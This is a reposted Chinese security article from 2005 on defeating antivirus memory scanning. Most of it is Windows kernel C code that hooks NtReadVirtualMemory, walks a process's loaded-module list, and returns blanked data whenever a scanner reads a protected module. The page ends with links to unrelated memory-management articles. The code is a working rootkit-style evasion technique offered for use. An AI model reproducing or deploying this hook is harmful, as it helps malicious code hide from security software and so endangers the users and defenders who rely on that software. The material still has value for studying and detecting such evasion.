对抗杀毒软件的内存扫描

2024-04-20 16:38

本文主要是介绍对抗杀毒软件的内存扫描,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

Author:Polymorphours
Email: Polymorphours@whitecell.org
Homepage:http://www.whitecell.org
Date:2005-11-17

/*++
  Author: Polymorphours
 
 Date: 2005/1/10

 通过对 NtReadVirtualMemory 挂钩,防止其他进程对保护的模块进行扫描,
 如果发现其他进程读被保护模块的内存,则返回0

--*/


typedef struct _LDR_DATA_TABLE_ENTRY {
 
 LIST_ENTRY InLoadOrderLinks;
 LIST_ENTRY InMemoryOrderLinks;
 LIST_ENTRY InInitializationOrderLinks;
 PVOID DllBase;
 PVOID EntryPoint;
 ULONG SizeOfImage;
 UNICODE_STRING FullDllName;
 UNICODE_STRING BaseDllName;
 
 
 /*
 +0x034 Flags: Uint4B
 +0x038 LoadCount: Uint2B
 +0x03a TlsIndex : Uint2B
 +0x03c HashLinks: _LIST_ENTRY
 +0x03c SectionPointer : Ptr32 Void
 +0x040 CheckSum : Uint4B
 +0x044 TimeDateStamp: Uint4B
 +0x044 LoadedImports: Ptr32 Void
 +0x048 EntryPointActivationContext : Ptr32 Void
 +0x04c PatchInformation : Ptr32 Void
 */
} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;

/*++

 函数名: MyNtReadVirtualMemory
 
 参数:
  IN HANDLE ProcessHandle,
  IN PVOID BaseAddress,
  OUT PVOID Buffer,
  IN ULONG BufferLength,
  OUT PULONG ReturnLength OPTIONAL
 
 功能:
  隐藏保护模块的内存,如果发现有内存扫描到这块内存,则返回加密后的数据扰乱扫描过程
 
 返回:
  NTSTATUS
 
--*/


NTSTATUS
MyNtReadVirtualMemory(
 IN HANDLE ProcessHandle,
 IN PVOID BaseAddress,
 OUT PVOID Buffer,
 IN ULONG BufferLength,
 OUT PULONG ReturnLength OPTIONAL
 )
{
 NTSTATUS status;
 PEPROCESS eProcess;
 PVOIDPeb;
 
 PPEB_LDR_DATA PebLdrData;
 PLDR_DATA_TABLE_ENTRY LdrDataTableHeadList;
 PLDR_DATA_TABLE_ENTRY LdrDataTableEntry;
 
 PLIST_ENTRY Blink;
 PPROTECT_NODEFileNode = NULL;
 BOOLEANbHideFlag = FALSE;
 ULONGImageMaxAddress = 0;

/*
#ifdef _DEBUG
 DbgPrint( "Call Process: %s, BaseAddress: %08x/n", PsGetProcessImageFileName( PsGetCurrentProcess() ), BaseAddress );
#endif
*/

 status =ObReferenceObjectByHandle(
  ProcessHandle,
  FILE_READ_DATA,
  PsProcessType,
  KernelMode,
  (PVOID)& eProcess,
  NULL
  );
 if ( NT_SUCCESS(status) ) {
 
  //
  // 得到PEB的地址
  //
 
  Peb = (PVOID)(*(PULONG)((PCHAR) eProcess + PebOffset));
 
  //
  // 切换到目标进程空间
  //
 
 
  KeAttachProcess( eProcess );
 
  //
  // 判断PEB是否有效,如果有效,那么准备利用PEB结构遍历进程加载的模块
  //

  if ( !MmIsAddressValid( Peb ) ) {

/*
#ifdef _DEBUG
 DbgPrint( "PEB is error./n" );
#endif
*/
 
 KeDetachProcess();
 ObDereferenceObject( eProcess );
 
 goto CLEANUP;
  }
 
  PebLdrData = (PPEB_LDR_DATA)(*(PULONG)( (PCHAR)Peb + 0xc ));
 
  if ( !PebLdrData ) {
 
 KeDetachProcess();
 ObDereferenceObject( eProcess );
 
 goto CLEANUP;
  }
 
  try {
 
 ProbeForRead (
  PebLdrData,
  sizeof(PEB_LDR_DATA),
  sizeof(ULONG)
  );
 
 //
 // 遍历模块链表
 //
 
 LdrDataTableHeadList = (PLDR_DATA_TABLE_ENTRY)PebLdrData->InLoadOrderModuleList.Flink;
 LdrDataTableEntry = LdrDataTableHeadList;
 
 
 do {
 
  ProbeForRead(
 LdrDataTableEntry,
 sizeof(LDR_DATA_TABLE_ENTRY),
 sizeof(ULONG)
 );
 
  if ( !LdrDataTableEntry->DllBase ) {

 LdrDataTableEntry = (PLDR_DATA_TABLE_ENTRY)LdrDataTableEntry->InLoadOrderLinks.Flink;
 continue;
  }

 
  //
  // 判断读的内存属于那一个模块,如果都不属于,那么放过
  //

  ImageMaxAddress = (ULONG)((ULONG)LdrDataTableEntry->DllBase + LdrDataTableEntry->SizeOfImage);
 
  if ( (ULONG)( (ULONG)BaseAddress + BufferLength) < (ULONG)LdrDataTableEntry->DllBase ||
  (ULONG)BaseAddress > ImageMaxAddress ) {

  //
  // 如果不是读模块区域,那么枚举下一个
  //

 LdrDataTableEntry = (PLDR_DATA_TABLE_ENTRY)LdrDataTableEntry->InLoadOrderLinks.Flink;
 continue;
  }
 
  //
  // 如果是被保护的模块,那么返回虚假数据
  //

  bHideFlag = FALSE;
  Blink = ProtectFile.Blink;
 

  while ( Blink != &ProtectFile ) {

 FileNode = CONTAINING_RECORD( Blink, PROTECT_NODE, ActiveLink );
 
 //
 // 如果发现当前文件存在于隐藏列表,那么设置隐藏标志隐藏它
 //

 if ( wcsstr( FileNode->ProtectName, LdrDataTableEntry->FullDllName.Buffer ) ) {

  bHideFlag = TRUE;
  break;
 }

 Blink = Blink->Blink;
  }
 
  if ( bHideFlag ) {
 
 //
 // 返回原本的进程空间进行处理
 //

 KeDetachProcess();
 ObDereferenceObject( eProcess );

 ProbeForWrite(
  Buffer,
  BufferLength,
  sizeof(ULONG)
  );
 
 memset( Buffer, 0x00, BufferLength );
 
 ProbeForWrite(
  ReturnLength,
  sizeof(PULONG),
  sizeof(ULONG)
  );
 
 *ReturnLength = BufferLength;
 
 return STATUS_SUCCESS;
  }
 
  LdrDataTableEntry = (PLDR_DATA_TABLE_ENTRY)LdrDataTableEntry->InLoadOrderLinks.Flink;
 
 } while ( LdrDataTableEntry != LdrDataTableHeadList );
 

  } except( EXCEPTION_EXECUTE_HANDLER ) {

 if ( !bHideFlag ) {
 
  KeDetachProcess();
  ObDereferenceObject( eProcess );
 }

 goto CLEANUP;
  }


  KeDetachProcess();
  ObDereferenceObject( eProcess );
 }
 
CLEANUP:

 return NtReadVirtualMemory(
 ProcessHandle,
 BaseAddress,
 Buffer,
 BufferLength,
 ReturnLength
 );
}


WSS(Whitecell Security Systems),一个非营利性民间技术组织,致力于各种系统安全技术的研究。坚持传统的hacker精神,追求技术的精纯。
WSS 主页:http://www.whitecell.org/
WSS 论坛:http://www.whitecell.org/forums/ 
 

这篇关于对抗杀毒软件的内存扫描的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/920778

相关文章

Redis实现高效内存管理的示例代码

《Redis实现高效内存管理的示例代码》Redis内存管理是其核心功能之一,为了高效地利用内存,Redis采用了多种技术和策略,如优化的数据结构、内存分配策略、内存回收、数据压缩等,下面就来详细的介绍... 目录1. 内存分配策略jemalloc 的使用2. 数据压缩和编码ziplist示例代码3. 优化的

深入解析C++ 中std::map内存管理

《深入解析C++中std::map内存管理》文章详解C++std::map内存管理,指出clear()仅删除元素可能不释放底层内存,建议用swap()与空map交换以彻底释放,针对指针类型需手动de... 目录1️、基本清空std::map2️、使用 swap 彻底释放内存3️、map 中存储指针类型的对象

Python内存优化的实战技巧分享

《Python内存优化的实战技巧分享》Python作为一门解释型语言,虽然在开发效率上有着显著优势,但在执行效率方面往往被诟病,然而,通过合理的内存优化策略,我们可以让Python程序的运行速度提升3... 目录前言python内存管理机制引用计数机制垃圾回收机制内存泄漏的常见原因1. 循环引用2. 全局变

MySQL 内存使用率常用分析语句

《MySQL内存使用率常用分析语句》用户整理了MySQL内存占用过高的分析方法,涵盖操作系统层确认及数据库层bufferpool、内存模块差值、线程状态、performance_schema性能数据... 目录一、 OS层二、 DB层1. 全局情况2. 内存占js用详情最近连续遇到mysql内存占用过高导致

最新Spring Security的基于内存用户认证方式

《最新SpringSecurity的基于内存用户认证方式》本文讲解SpringSecurity内存认证配置,适用于开发、测试等场景,通过代码创建用户及权限管理,支持密码加密,虽简单但不持久化,生产环... 目录1. 前言2. 因何选择内存认证?3. 基础配置实战❶ 创建Spring Security配置文件

java内存泄漏排查过程及解决

《java内存泄漏排查过程及解决》公司某服务内存持续增长,疑似内存泄漏,未触发OOM,排查方法包括检查JVM配置、分析GC执行状态、导出堆内存快照并用IDEAProfiler工具定位大对象及代码... 目录内存泄漏内存问题排查1.查看JVM内存配置2.分析gc是否正常执行3.导出 dump 各种工具分析4.

怎样通过分析GC日志来定位Java进程的内存问题

《怎样通过分析GC日志来定位Java进程的内存问题》:本文主要介绍怎样通过分析GC日志来定位Java进程的内存问题,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录一、GC 日志基础配置1. 启用详细 GC 日志2. 不同收集器的日志格式二、关键指标与分析维度1.

Java内存分配与JVM参数详解(推荐)

《Java内存分配与JVM参数详解(推荐)》本文详解JVM内存结构与参数调整,涵盖堆分代、元空间、GC选择及优化策略,帮助开发者提升性能、避免内存泄漏,本文给大家介绍Java内存分配与JVM参数详解,... 目录引言JVM内存结构JVM参数概述堆内存分配年轻代与老年代调整堆内存大小调整年轻代与老年代比例元空

C++高效内存池实现减少动态分配开销的解决方案

《C++高效内存池实现减少动态分配开销的解决方案》C++动态内存分配存在系统调用开销、碎片化和锁竞争等性能问题,内存池通过预分配、分块管理和缓存复用解决这些问题,下面就来了解一下... 目录一、C++内存分配的性能挑战二、内存池技术的核心原理三、主流内存池实现:TCMalloc与Jemalloc1. TCM

Redis过期删除机制与内存淘汰策略的解析指南

《Redis过期删除机制与内存淘汰策略的解析指南》在使用Redis构建缓存系统时,很多开发者只设置了EXPIRE但却忽略了背后Redis的过期删除机制与内存淘汰策略,下面小编就来和大家详细介绍一下... 目录1、简述2、Redis http://www.chinasem.cn的过期删除策略(Key Expir